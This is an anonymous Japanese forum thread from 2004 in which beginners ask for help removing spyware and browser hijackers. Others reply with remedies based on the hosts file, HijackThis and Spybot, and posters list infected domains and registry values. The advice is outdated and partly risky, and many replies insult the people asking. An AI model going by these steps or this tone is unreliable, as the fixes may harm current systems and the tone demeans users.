気分を害する人はシカトしてください!
アーレフの方が先程、ムラムラした時のウィルス対処方と
PCについて教えてくれと言っていたので、一寸行ってきます。
OSはノーマルのズルムケ&只今6cm程です!

457 :454:04/05/21 16:22 ID:FEFEU/ot
>>455
影武者偽装ファイルって何ですか?

458 :ひよこ名無しさん:04/05/21 16:25 ID:???
CoolWebSearch対策用の
http://www.safer-networking.org/files/delcwssk.zip

これdじゃってるみたいですが他においてある場所無いですか?
 

459 :ひよこ名無しさん:04/05/21 16:26 ID:???
>>457
影武者で偽装されたファイル

460 :ひよこ名無しさん:04/05/21 16:29 ID:???
>>458
ダウンロードできたぞ。

461 :ひよこ名無しさん:04/05/21 17:10 ID:???
>>458
dでないぞ。
自分の頭と間違えてるんじゃないか?

462 :ひよこ名無しさん:04/05/21 17:11 ID:???
>>458
あんた誰?

463 :ひよこ名無しさん:04/05/21 17:47 ID:FiqKY71h
アップローダーを適当に覗いていたら、スパイウェアに感染してしまったようです。
応急処置をいくつか試してみたんですが、IEのホームページがサーチサイトに書き換えられてしまいます。
ノートンアンチウイルスを買ってインストールすれば治りますか?

464 :ひよこ名無しさん:04/05/21 17:48 ID:???
>>463
テンプレ読めっつってんだろエロ坊主

465 :ひよこ名無しさん:04/05/21 17:54 ID:FiqKY71h
>>464
だから応急処置しても治んないんだっつーの。

466 :ひよこ名無しさん:04/05/21 17:55 ID:???
(´ι _`  ) アッソ

467 :ひよこ名無しさん:04/05/21 17:56 ID:???
>>465
何々試したのよ?

468 :ひよこ名無しさん:04/05/21 18:00 ID:FiqKY71h
>>467
>>3の1,2,3,6,8

469 :ひよこ名無しさん:04/05/21 18:09 ID:???
>>468
>>46

470 :ひよこ名無しさん:04/05/21 18:12 ID:FiqKY71h
Hijackthis関連のページを開くとブラウザが閉じるんだよ。
spybotも同じく。

471 :ひよこ名無しさん:04/05/21 18:13 ID:FiqKY71h
ノートンのイントールじゃ治らないの?

472 :ひよこ名無しさん:04/05/21 18:16 ID:???
>>468
名前欄に最初のレス番(463)
OSとIEのバージョン
一応オンラインスキャンでウィルス検査もする

次これ
http://higaitaisaku.web.infoseek.co.jp/hijackthis.html
スレの>>42>>329>>387>>388を見て、同じエントリがあったら削除

それでも直らなかったら再度質問

473 :ひよこ名無しさん:04/05/21 18:19 ID:???
>>470
先にhostsファイルかよ・・・
情報小出しにしないでくれ

hostsファイルを探してメモ帳とかで開いて
#行は無視
127.0.0.1localhostを残して全部削除
localhostがなければ上のをコピペ入れる 間はTab
上書き保存

474 :463:04/05/21 18:19 ID:FiqKY71h
>>472
hijackthisダウンロードできないです。
ノートンじゃ治らないんですか?

475 :ひよこ名無しさん:04/05/21 18:19 ID:pfVuqptT
スパイだかウィルスだか知らないけど感染してどうしようもなくなり
(スパイウェア除去ソフトとか使ってもダメ。)
二度とインターネット出来なくなる覚悟でリカバリしますた。


戻ってきたよ!!!!!!!!!!!!!!!!!!!!
途中接続できなくて困ったりしたけど
カムバックしますた!!!!!!!!!!!!!!!!!
よろこべ同士よ! はー嬉しい。
さっ これから いろいろやらねば。

476 :ひよこ名無しさん:04/05/21 18:20 ID:???
どうして手間を省いて回復させたがるんだろう?
まとめサイトとか全部読んだのか?

それと、
PCの情報を出せよ!
スレ住民は神じゃない。お前の環境はお前しか分からないだろうが。

あーだこーだ文句ばかり言うなら手っ取り早くOS再インスコしろ。

477 :ひよこ名無しさん:04/05/21 18:22 ID:???
    ∧_∧
    ( ・∀・) お茶
  oノ∧つ⊂)
  ( ( ・∀・) くだ
  oノ∧つ⊂)
  ( ( ・∀・)  さい♪
  ∪( ∪ ∪
    と__)__)

478 :463:04/05/21 18:23 ID:FiqKY71h
XPだよ。
初心者だからできるところまではやったけど
治らないから質問してるんじゃないか。
ノートンではダメなの?

479 :ひよこ名無しさん:04/05/21 18:23 ID:uRaN/tSC
>>990-1000

480 :ひよこ名無しさん:04/05/21 18:24 ID:???
>>474
先に473やれ
お前が情報小出しにするから、こういう手間がかかるんだ
OSとIEのバージョンも書けっつってんだろが!

481 :463:04/05/21 18:27 ID:FiqKY71h
小出しとか言われてもわかんねーんだよ。
初心者にキレずに丁寧な人いねーのかな。

482 :ひよこ名無しさん:04/05/21 18:29 ID:???
>>481
この野郎、金出せ。

483 :463:04/05/21 18:30 ID:FiqKY71h
さっきから何度も聞いてるのに誰も答えてくれないんだが、

ノートンでは治らないんですか?

484 :ひよこ名無しさん:04/05/21 18:31 ID:???
>>483
ノートンに聞いてみろ。

485 :463:04/05/21 18:31 ID:FiqKY71h
>>484
あんたに聞いてないよ。
大人の回答待つ。

486 :ひよこ名無しさん:04/05/21 18:32 ID:???
>>481
もう相手すんの止めた
人のレスも読まない、大体>>1に書いてある質問の仕方も読んでない

これ以上ない丁寧な対処法書いてやったんだから勝手にしろ

487 :ひよこ名無しさん:04/05/21 18:33 ID:???
ウィルズ感染してるかもしれんからスキャンしとけ(最新パターンでな)

488 :463:04/05/21 18:33 ID:FiqKY71h
ちなみに>>473やってもダメだった。

489 :ひよこ名無しさん:04/05/21 18:33 ID:???
>>485
バカじゃねえの?
何かわからんのにノートンで治るかどうかなんてどうしてわかるんだよ?

490 :ひよこ名無しさん:04/05/21 18:37 ID:???
それが人にものを頼む態度かよ。失礼なヤツだな。

>483
484に同意。
Nortonで対処できるかどうかはウィルスチェックやって引っかかるかどうかによる。
ここで聞く前に、最新の定義でウィルスチェックくらい当然やってるよな?
それでNortonが反応しないなら、Nortonでは直らないと思え。

ていうか、>473やれって。
皆がキレてるのはお前の言動がガキっぽいから。
わざわざ皆が、キミのレべルに合わせてくれてるんだよ。感謝しなさい。
オトナの対応を望むなら、お前が大人の反応をしろ。


491 :463:04/05/21 18:38 ID:FiqKY71h
>>787
サンクス。今から外出するので帰ったらやってみます。

>>489
おまえはもういいってば。初心者バカにするのが趣味なんだな。

492 :463:04/05/21 18:42 ID:FiqKY71h
>>491
だっていきなり>>464だよ?
それに合わせたんじゃねーか。
ちと外出するのでまた後で。
もう来ないかもしれないが。

493 :ひよこ名無しさん:04/05/21 18:46 ID:???
>>492

hijackthisダウンロードできない

http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

494 :467.472.473.486:04/05/21 18:49 ID:???
>>464>>489も正しい

495 :偽ぼるじょあ ◆.FS.okPiNk :04/05/21 18:54 ID:???
こちらのページにも接続できない、あるいは実行ファイルがダウンロードできない、
ダウンロードできてもすぐに閉じてしまう場合には、
ファイル名だけを「higaitaisaku.exe」に変更したこちらを使ってみて下さい。
(・ε・)エェー
その後セーフモードで実行。LANケーブル抜いた方がいいYO
 

496 :ひよこ名無しさん:04/05/21 18:59 ID:BGXJFfJn
どうにも行き詰まってしまったので質問させて下さい。_| ̄|○

使用OS:Windows2000 ServicePack3
使用ブラウザ:IE6.0.2800.1106ベースのSleipnir Ver.1.42
使用2chブラウザ:ホットゾヌ 2 βage12

■症状■
特定のサイトを開くとブラウザが落ちる。
CoolWebShredder本家サイトやスパイウェア紹介サイトなど。
zhwnbr.outhost.info/search.php?qq=Spyware+Removal
↑スパイウェア紹介サイト?下記CASINO系のページからリンクされてます。
詳細は解りませんがスパイウェア仕込まれてるかもしれないので行かないで下さい。

インターネットオプションのホームページ設定の標準設定が
zhwnbr.outhost.info/
になっている。CASINO系のサイト。
詳細は解りませんがスパイウェア仕込まれてるかもしれないので行かないで下さい。

レジストリエディタ起動後、数秒後にレジストリエディタが必ず落ちる。(約2秒〜5秒後程度)

497 :ひよこ名無しさん:04/05/21 18:59 ID:???
偽者なんですかぁ〜

498 :496:04/05/21 18:59 ID:BGXJFfJn
■症状続き■
特定のファイルをダウンロードできない。
CoolWebShredder(ttp://higaitaisaku.web.infoseek.co.jp/の .exe .zip 共に)
ttp://higaitaisaku.web.infoseek.co.jp/HijackThis.exeなど
エラー文:ファイルをコピーできません 送り側のファイルまたはディスクから読み取れません

極々稀に2chブラウザが突然落ちる。
書き込みをしようとした場合に落ちることが多い。

Ad-aware 6.0で除去後、レジストリデータとして「Possible Browser Hijack attempt」が
6個、復活する。何度除去してもAd-aware 6.0実行するたびに発見。
◆最後のURLはhttp://を抜いてます。上記で書いているCASINO系サイトと同じです。詳細が解らないので行かないで下さい。◆
HKEY_USERS:Default\Software\Microsoft\Internet Explorer\Main"Start Page" ("zhwnbr.outhost.info/")
HKEY_USERS:Default\Software\Microsoft\Internet Explorer\Main"Default_Page_URL" ("zhwnbr.outhost.info/")
HKEY_LOCAL_MACHINE:\Software\Microsoft\Internet Explorer\Search"CustomizeSearch" ("zhwnbr.outhost.info/sp.php")
HKEY_LOCAL_MACHINE:\Software\Microsoft\Internet Explorer\Main"Start Page" ("zhwnbr.outhost.info/")
HKEY_LOCAL_MACHINE:\Software\Microsoft\Internet Explorer\Main"Default_Page_URL" ("zhwnbr.outhost.info/")
HKEY_CURRENT_USERS:\Software\Microsoft\Internet Explorer\Main"Start Page" ("zhwnbr.outhost.info/")
◆最後のURLはhttp://を抜いてます。上記で書いているCASINO系サイトと同じです。詳細が解らないので行かないで下さい。◆

以上のような症状が今現在確認できる症状です。

499 :ひよこ名無しさん:04/05/21 18:59 ID:???
>>492
自分にレスしてるのもナニでアレだが。

>>464が返ってくるのは仕方ないだろうね。
どう見ても>>463を読む限りでは、テンプレ見ているとは思えない。
テンプレにある「質問のしかた」の

・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、自分でしたことと結果を明記。

が完璧に抜けてるあたりで、誰もがそう判断するだろう。
つまり464も、463に「あわせた」発言だったんだよ。


500 :496:04/05/21 19:00 ID:BGXJFfJn
■自己対処■
1)Ad-aware 6.0でスパイウェアの除去(定義アップデート後実行)
2)all.exeの除去  ←PC起動後、自動実行しCPU使用率を常に100%状態にしてました
3)怪しいプログラム(PC起動後、プロセスに入る自動実行される怪しいプログラム)の削除
4)アプリケーションの追加と削除から怪しいアプリケーションのアンインストール
5)インターネット一時ファイルの全削除、およびCookieの削除
6)Web設定のリセットの実行
7)IE関連のレジストリの初期化  ←IE RegCleanFix Ver.1.0使用
8)Windows Updateの漏れがないか確認  ←ありませんでした
9)レジストリを起動させる為に「レジストリエディタ 勝手に閉じる」でサイト検索

■実行不可だったこと■
1)テンプレ>>3の6)のa)とc)  事由:ダウンロード不可およびブラウザが即落ちる為
2)テンプレ>>6の ttp://higaitaisaku.web.infoseek.co.jp/HijackThis.exe の実行  事由:ダウンロード不可の為

色々と試行錯誤してきましたが行き詰まってしまいました。解決方法がどーにも見つかりません。_| ̄|○
レジストリエディタがちゃんと起動するようになって、SpybotとかHijackThisとかCoolWebShredderが
実行できる環境になれば自己解決できそうなのですが…不可能なのでどなたか御助力下さい。お願いします。_| ̄|○

501 :463:04/05/21 19:00 ID:FiqKY71h
>>493
システムの復元しようとして、hostsファイルを置き換えたところ、ダメでした。

>>494
「っつってんだろエロ坊主」「バカじゃねーの?」
が正しいですか。そーですか。

>>495
帰ったらやってみます。
では。

502 :ひよこ名無しさん:04/05/21 19:00 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
5) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
  アプリケーションの追加と削除(JWordはここでアンインストのこと)→OS再起動
6) 定番駆除ツールで駆除  a)→b)→c)の順に実行してください。
 a)CoolWebShredder 他のツールで駆除しにくいブラウザジャッカーCoolWebSearch
  専用の駆除ツールです。まずこれから実行。
  http://higaitaisaku.web.infoseek.co.jp/removecws.html#jyokyo 
  または本家 ttp://www.spywareinfo.com/~merijn/downloads.html→OS再起動
 b) Ad-Aware http://www.lavasoftusa.com/ (更新頻度高)
 c) Spybot-S&D http://www.safer-networking.org/ (強力だが更新頻度低)
8)Me/XPの場合「システムの復元」で直近の正常な状態に復帰させる、という手もアリ。
 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]
  →[システムの復元]

503 :ひよこ名無しさん:04/05/21 19:02 ID:???
ダウンロードできないのはIEだからなのかな?
ダウンロードソフト(iriaとか)使えば落とせるんじゃないか?

504 :ひよこ名無しさん:04/05/21 19:06 ID:???
>>463

実行ファイルがダウンロードできない、ダウンロードできてもすぐに閉じてしまう場合には、
ファイル名だけを「higaitaisaku.exe」に変更したこちらを使ってみて下さい。

http://higaitaisaku.web.infoseek.co.jp/higaitaisaku.exe

505 :496:04/05/21 19:10 ID:BGXJFfJn
>>503-504
>>504氏のリンクでIria使ったら落とせました。
有難う御座います。実行してみます。後ほど経過報告致します。

506 :ひよこ名無しさん:04/05/21 19:16 ID:???
      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      |   マスター、今夜も賑わってるね♪
       レヽ___________________
   ∧_∧        ∧_∧    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   (  ・∀) / ̄ヽ  (´∀`  ) < ありがとうございますモナ
   (   `つ 日 凸 ( つ つヽ  \________________
   (_ ⌒./   凵ヽ | | | |ヽ.凸|   |
   「  (_/Y     ヽ _(__) | |\|   |
  ┗┳━| ̄ ̄ ̄ ̄ ̄|    ..   \|. │  |
    ┻\|        .|        \.|   │

507 :496:04/05/21 19:21 ID:BGXJFfJn
経過報告です。
>>504
HijackThis実行後、Scan→Log書き出しで
hijackthis.logがありませんとエラーが出て 作成しますか?→はい と
やってもhijackthis.logは作成されずにテキストファイルをhijackthis.logに
改名して保存しようとするとすでに出来てますと警告が出ます。
ファイル検索かけてもhijackthis.logが見つからないという矛盾した状態になってしまいました。_| ̄|○

508 :ひよこ名無しさん:04/05/21 19:26 ID:???
そりゃまずいな。

509 :ひよこ名無しさん:04/05/21 19:26 ID:???
ファイル検索は「.」を入れないでやらないとダメじゃなかったか?

hijackthisとかlogとかでやってみてみ

510 :ひよこ名無しさん:04/05/21 19:28 ID:???
U3Iqi3cmYbk

511 :ひよこ名無しさん:04/05/21 19:28 ID:???
すまん>>509は俺の勘違いだったよ

512 :ひよこ名無しさん:04/05/21 19:28 ID:???
RjXxrdN7Ybs

513 :496:04/05/21 19:30 ID:BGXJFfJn
>>508-509
レス有難う御座います。

レスを見たあと試したのですがhijackthis.logをデスクトップに
作成するとhijackthis.logの名前で作成できたかと思うと消えてます。_| ̄|○

検索時にhijackthisのみ、logのみで検索もかけてみましたが
どーやらヒットしない模様。何が悪さしてるのか皆目検討つきません。(;´Д`)

あとhijackthisを実行後、Scanができるくらいの時間は起動してますが
hijackthisも10秒後ほどに勝手に落ちてしまいます…チェックがつけれないです。( つД`)

514 :ひよこ名無しさん:04/05/21 19:31 ID:???
>>513
ウイルスです。

515 :ひよこ名無しさん:04/05/21 19:32 ID:???
>>513
今すぐ電気店に行って
ウイルス対策ソフト買ってきたほうがいい
アップデートしてから使えよ

516 :ひよこ名無しさん:04/05/21 19:32 ID:???
>>501
言ってることは正しいんだよ
お前が>>1も読まず書式守らないから煽られるんだよ

>>513
これやってみて

CoolWWWSearch.SmartKiller (v1/v2) MiniRemoval
ttp://www.majorgeeks.com/download4113.html

CoolWebSearchハイジャッカーを駆除する専用ツールが
CWShredder。

CoolWWWSearch.SmartKillerというのはCWShredder、Spybotなど
アンチスパイを強制終了させたり、アンチスパイサイトへの接続
を妨害したりする悪質ハイジャッカー。

517 :ひよこ名無しさん:04/05/21 19:34 ID:???
>>513
HackerDefenderを悪用したスパイウェア − スパイウェア除去アプリケーションが使えない
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

518 :ひよこ名無しさん:04/05/21 19:35 ID:???
>>516補足
spybotの作者作成のCWS発見・駆除ツールだから

519 :496 ◆B0iOQRAl/w :04/05/21 19:35 ID:BGXJFfJn
>>513
はっ!?一番大事なことを忘れてました!!

>>503-504>>508-509
レス頂いたのに本当申し訳ないです。
スパイウェアにばっかり頭が行ってて
ウィルスチェッカー走らすの忘れてました。(;´Д`)

ノートン先生を走らせてみます。m_ _m
またお世話になるかもしれませんが症状改善でも
報告に参ります。一旦ここで消えます。m_ _m

520 :ひよこ名無しさん:04/05/21 20:39 ID:???
突然すいません。修復コンソールってなんですか?やり方とか教えて下さい。お願いします

521 :ひよこ名無しさん:04/05/21 20:39 ID:???
>>520
それは難題ですね

522 :ひよこ名無しさん:04/05/21 20:42 ID:???
あちこちで聞くより検索(ry

523 :ひよこ名無しさん:04/05/21 20:48 ID:???
>>520
何の為のインターネットですか?
検索して調べる事も出来ないのですか?


524 :520:04/05/21 20:49 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

525 :ひよこ名無しさん:04/05/21 20:52 ID:???
ハイ、さようなら

526 :ひよこ名無しさん:04/05/21 20:54 ID:5b5Th/J+
なんかさ〜SPY−BOTとAD−AWAREのサイトに行くと、ウインドウが自動的に消えるんだよね〜
他のとこは大丈夫。絶対ウイルス入ってると思うんだけど、
今までこんな事するウイルスってあった?? もしかして新種??
いかにも「除去ソフトは入れさせんぞ!」って感じでムカつく。。

527 :520:04/05/21 20:54 ID:???

。・゚・(ノД`)・゚・。ウエエェェン  

528 :520:04/05/21 20:55 ID:???
>>522,>>533
すいませんでした。あと>>524はそういうことするのやめて下さい。

529 :ひよこ名無しさん:04/05/21 20:55 ID:???
>>526
http://life4.2ch.net/yume/

530 :ひよこ名無しさん:04/05/21 20:55 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ.   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

531 :ひよこ名無しさん:04/05/21 20:58 ID:???
本当にテンプレ(リンク先含む)読みましたか?
読んでませんよねぇ?

532 :ひよこ名無しさん:04/05/21 20:58 ID:???
>>526
>>493

533 :520:04/05/21 21:01 ID:???
おまえらなんか大嫌いだぁ

534 :526:04/05/21 21:02 ID:5b5Th/J+
>>532
まじTHANKS! でも復元も出来なかったんだよね〜〜

535 :ひよこ名無しさん:04/05/21 21:04 ID:???
>>534
>>504

536 :ぼるじょあ ◆.FS.okPiNk :04/05/21 21:08 ID:???
>>520
http://support.microsoft.com/default.aspx?scid=kb;ja;229716
(・ε・)エェー これかな?本物と違ってスキルがないからNE


537 :520:04/05/21 21:28 ID:???
低脳ばっか

538 :ひよこ名無しさん:04/05/21 21:39 ID:???
>>537
baka

539 :520:04/05/21 21:54 ID:???
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ.   │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

540 :399:04/05/21 22:14 ID:hqPoSowI
http://www.whenusearch.com/searchbar/?partner=secs3012&ui=sb.min.g2&cc=JP#
このサイトのやつです。

ちなみに表示→ツールバーをみてもsearchbarがありません。

消しかたわかる方お願いします。

541 :ひよこ名無しさん:04/05/21 22:15 ID:o+qCvNGV
こちらへ
http://science2.2ch.net/test/read.cgi/rikei/1084851084/4

542 :496 ◆B0iOQRAl/w :04/05/21 22:20 ID:BGXJFfJn
>>496>>498>>500>>505>>507>>513>>519
以上書き込みした者です。

ノートンを走らせた後、Backdoorが入ってまして検疫しました。
その後、>>516氏の紹介して頂いた
CoolWWWSearch.SmartKiller (v1/v2) MiniRemoval(ファイル名:delcwssk.zip)を
DLして実行しましたがRegistを求められて途中から進行できませんでした。
もしかしたらDLすべきファイルを間違ってるのかもしれませんが。(;´Д`)

SafeModeで立ち上げ後、HijackThisを実行し、見慣れぬ物を除去。<SafeModeで実行したら走りました
レジストリエディタもSafeModeで実行すれば閉じることがなかったので
「outhost」で検索後、持っているキーの中身の削除かキー自体の削除をしました。

hostsファイル内に見慣れぬアドレスが入っていたので
メモ帳で開き、127.0..0.1 localhost を追加し、上書き保存して
再起動をかけました。

再起動後、IEのホームページ設定の標準設定が
zhwnbr.outhost.info/ から xgamwf.outhost.info/ に
変わったことぐらいで>>496>>498で書いている症状の改善は見られませんでした。_| ̄|○

御助力頂けた皆様、有難う御座いました。まだ御助力頂けるようであればレスお願い致します。m_ _m

543 :偽ぼるじょあ ◆.FS.okPiNk :04/05/21 22:21 ID:???
>>540 (・ε・)エェー 
http://www.symantec.com/region/jp/sarcj/data/a/adware.whenu.html

544 :ひよこ名無しさん:04/05/21 22:28 ID:???
セーフモードで、CWShredder、spybot、ad-aware、hijackthisをやってみた?

あと、hostsは
>>473

545 :ひよこ名無しさん:04/05/21 22:28 ID:???
>>540
WhenUSearch - Desktop Toolbar Help
http://www.whenusearch.com/searchbar/help.html

546 :496 ◆B0iOQRAl/w :04/05/21 22:50 ID:BGXJFfJn
>>544
SafeModeで実行できるのはad-awareとHaijackThisだけで
CWShredderとspybotS&Dはインストール自体が困難な状態でした。
ダウンロード後の一時ファイルからのコピーが不可。
インストール途中に落ちる症状が見られる為。

hostsは>>473氏の書き込みを参考に実行しました。

今、ホットゾヌで開いてCWShredderとspybotS&Dを
ダウンロードしたらうまいこと行ったのでこれから
SafeModeでもう一度挑戦してみたいと思います。

レス有難う御座いました。Safemode実行後また書き込み致します。m_ _m

547 :ひよこ名無しさん:04/05/21 23:31 ID:dzPFO7Xr
何かメールがきて 2万払えだそうで。
「一定期間の督促でお支払いいただけない場合、登録情報は未払いデータとして
専門の債権回収業者に譲渡され、お客様の身辺調査から債権回収措置へと移行されます」
身に覚えがあるような無い様な・・・
払わないと、どうなるんでしょうか

548 :ひよこ名無しさん:04/05/21 23:32 ID:???
どうにもならない。

549 :ひよこ名無しさん:04/05/21 23:33 ID:???
http://pc5.2ch.net/test/read.cgi/pcnews/1066316455/l50

ここへGO!

550 :ひよこ名無しさん:04/05/21 23:34 ID:???

なるほど。

551 :338:04/05/21 23:37 ID:GzhVKTni
>>387,>>408さん
アンインストールしましたがいまだにインストーラ出てきます・・・。
プログラムの追加と削除の欄にWINDOWS XP HOTfixという項目がたくさんあります・・・。
なんか怪しい気がしますが、これ全部消せばインストーラ出てこなくなりますか?

552 :ひよこ名無しさん:04/05/21 23:38 ID:???
防犯・詐欺対策
http://that3.2ch.net/bouhan/

553 :ひよこ名無しさん:04/05/21 23:41 ID:dzPFO7Xr
身に覚えがあったんだけど、本当の場合はどうなるんでしょうか?

554 :ひよこ名無しさん:04/05/21 23:46 ID:???
正直どうなんだろうな。
実際に身に覚えがあり、請求書来て
支払わなかったら、どうなるんだ?

555 :ひよこ名無しさん:04/05/21 23:48 ID:???
>>551
これなのかな?
http://support.microsoft.com/default.aspx?scid=kb;ja;436381

556 :ひよこ名無しさん:04/05/21 23:48 ID:???
裁判所へ行くことになるな

557 :ひよこ名無しさん:04/05/21 23:50 ID:???
>>554
明らかに不当と思われる請求金額なら払わなくていいんじゃない?
消費者センターとか弁護士に聞かないとわからないけど

558 :ひよこ名無しさん:04/05/22 00:11 ID:ih/82Mrx
俺の場合は払った方がいいですよね
俺の場合、無料体験で気付いたら振り越しされてたんだけど
よくみたら、振り越しになるって書いてあった。
これから((((;゚Д゚))))するより、高い勉強料と思って振り込めばいいんですかね
誰か癒して(´;ω;`)

559 :ひよこ名無しさん:04/05/22 00:16 ID:???
>>558
(= ゚仝゚)<M字開脚キボンヌ

560 :496 ◆B0iOQRAl/w :04/05/22 00:19 ID:???
>>496>>498>>500>>505>>507>>513>>519>>542>>546

レス頂いた皆様、本当に有難う御座いました。( つД`)
レス番号が結構多いので割愛させて頂きますが本当に感謝です。m_ _m

>496>498で書いた症状がなくなりました。
が、spybotS&DでScanすると CnsMin(内訳4個) にFixがかからない状態で
残ります。あと DSO Exploit(内訳2個) ってゆーのが一旦はFixできるんですが
再起動などすると復活してきます。この2つに関しては大丈夫なんでしょうか?

CnsMin(上3個がLibraryの属性がFile、4個目がGlobal settingsの属性がレジストリキー)
C:\WINNT\Downloaded Program Files\CnsMinSV.dll
C:\WINNT\Downloaded Program Files\CnsMinEx.dll
C:\WINNT\Downloaded Program Files\CnsMin.dll
HKEY_USERS\Default\Software\3271

DSO Exploit(2個ともData source object exploitの属性がレジストリ値)
HKEY_USERS\S-1-5-21-1390067357-1383384898-1708537768-500\Software\Microsoft\CurrentVersion\Internet Settings\Zones\0\1004!=W=3
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1004!=W=3

参考ページなど教えて頂けると幸いです。

10時間以上闘った結果、勝てたと判断していいのかな…。正直、疲れたですがあと一踏ん張りです。(`・ω・´)

P.S.検索結果
http://www.google.co.jp/search?q=DSO+Expliot&ie=UTF-8&hl=ja&lr=
http://www.google.co.jp/search?hl=ja&ie=UTF-8&q=CsnMin&lr=

561 :ひよこ名無しさん:04/05/22 00:31 ID:???
>>496
俺にはもうワカランなぁ

やるとしたら
1.「dll」を「txt」とかに変更
2.レジストリは問題の個所だけバックアップをとり削除する
3.これで不具合をみてみる
これくらいかなぁ。言っておいてなんだが自己責任で頼む。

562 :ひよこ名無しさん:04/05/22 00:33 ID:???
>>560
喪前、正直そこまでやるならリカバリした方がはえーぞ

563 :ひよこ名無しさん:04/05/22 00:42 ID:???
あ〜・・リンク先見てもよくわからない(ノД`)
WWW.CCTV8.NETってとこが勝手にホームになるのですが
これの対策も応急処置のやり方でいいんでしょうか?
やってみたけどよくわからないんです・・・

564 :496 ◆B0iOQRAl/w :04/05/22 00:42 ID:???
>>561
レス有難う御座います。
> これくらいかなぁ。言っておいてなんだが自己責任で頼む。
それはもう重々承知してますので御助言感謝です。m_ _m

>>562
正直、そーしようかとも思いましたがまた変なの踏んで
またリカバリする、OS再インストールの選択肢しか選べなく
なって知識が増えて行かずこのまま自己防衛もできないまま
のほほんとネットを使用するのもダメかなと思いまして。

バックアップ取らなきゃダメな容量が20GB以上あるので
そのことも考えた結果、直そうと思ったのもありますけどね。

皆様有難う御座いました。これからはまた名無しに戻ります。

P.S.>>560書いたあと自分なりに調べてみました。
DSO Exploit は無害なようなので放置します。
CnsMin はJWord関連でこちらも無害っぽいので放置します。
皆様、本当に有難う御座いました。m_ _m

565 :563:04/05/22 00:43 ID:???
気にしないことにしました(・∀・)

566 :ひよこ名無しさん:04/05/22 00:44 ID:???
お疲れサン

567 :563:04/05/22 00:45 ID:???
偽者が出てきた(ノД`)
気にしますよー(´・ω・`)・・

568 :ひよこ名無しさん:04/05/22 00:45 ID:???
http://www.cctv8.net/index.htmlに飛ばされる

569 :ひよこ名無しさん:04/05/22 00:46 ID:???
>>565
ワロタ

570 :ひよこ名無しさん:04/05/22 00:48 ID:???
>>565
そう汁
あんま気にしてると髪の毛に良くないからな

571 :ひよこ名無しさん:04/05/22 00:50 ID:???
質問者はID出してください。

572 :563:04/05/22 00:52 ID:4ic/uiGU
すいません。
出しました。
ホームは一応直したけど
語尾にWWW.CCTV8.NETって付いてます・・
なんなんでしょう、コレは(´・ω・`)

573 :ひよこ名無しさん:04/05/22 00:55 ID:???
>>572
http://www.cctv8.net/index.htmlに飛ばされる
http://higaitaisaku.web.infoseek.co.jp/removecctv8.html

574 :563:04/05/22 00:58 ID:4ic/uiGU
>>573
今見てみますね。
わからないことあったらまた質問させてもらうかもです・・
ありがとうございました!


575 :ひよこ名無しさん:04/05/22 01:19 ID:???
顔文字うぜーよ。いちいち使うな。

576 :ぼるじょあ ◆yEbBEcuFOU :04/05/22 01:20 ID:???
(・3・) エェー ボクちょっとしかうざくないYO

577 :ひよこ名無しさん:04/05/22 01:25 ID:dfyEbc+U
IEを起動するとFind-Online.netに必ず飛ばされてしまいます。
「インターネットオプション」で書き換えても再起動すると元に
戻ってしまいます。元に戻す方法を教えてください。過去スレにも
同じ質問があったようですが見られませんので・・

578 :ひよこ名無しさん:04/05/22 01:29 ID:???
テンプレ読まない厨は無視

579 :ひよこ名無しさん:04/05/22 01:31 ID:???
《応急処置》
WEB見ててブラウザが変になったらとりあえず以下を実行。ブラクラ、ジョークソフト、
ブラウザジャッカー、スパイウェアなどの迷惑ソフトの8割はこれで撃退できますよん。

1) 閉じない窓を強制的に閉じる→alt+F4
2) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
  プログラム→WEB設定のリセット(作業中頻繁に実行してください。無限ループ防止)
3)IEの履歴削除→ツール→インターネットオプション→全般→インターネット
  一時ファイル→クッキーの削除+ファイルの削除
4) 削除したいファイルがあるが「アクセスできません。使用中です」とかいわれて
  削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
